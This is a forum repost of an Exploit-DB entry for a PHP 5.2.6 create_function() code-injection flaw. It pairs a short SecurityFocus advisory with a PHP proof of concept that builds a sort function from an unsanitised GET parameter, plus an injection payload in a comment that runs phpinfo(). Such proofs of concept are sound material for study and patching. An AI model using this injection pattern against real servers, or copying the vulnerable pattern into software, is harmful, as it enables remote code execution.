Exploit PHP 5.2.6 - 'create_function()' Code Injection (1)

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
32416
Проверка EDB
  1. Пройдено
Автор
80SEC
Тип уязвимости
REMOTE
Платформа
PHP
CVE
N/A
Дата публикации
2008-09-25
PHP:
source: https://www.securityfocus.com/bid/31398/info

PHP is prone to a code-injection weakness because it fails to sufficiently sanitize input to 'create_function()'. Note that the anonymous function returned need not be called for the supplied code to be executed.

An attacker who can exploit this weakness will be able to execute code with the privileges of an additional vulnerable program.

This weakness is reported in PHP 5.2.6; other versions may also be affected. 

<?php
# call as test.php?sort_by="]);}phpinfo();/*
$sort_by=stripslashes($_GET[sort_by]);
$databases=array("test");
$sorter = 'var_dump';
$sort_function = ' return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); ';


usort($databases, create_function('$a, $b', $sort_function));

?>
 
Источник
www.exploit-db.com

Похожие темы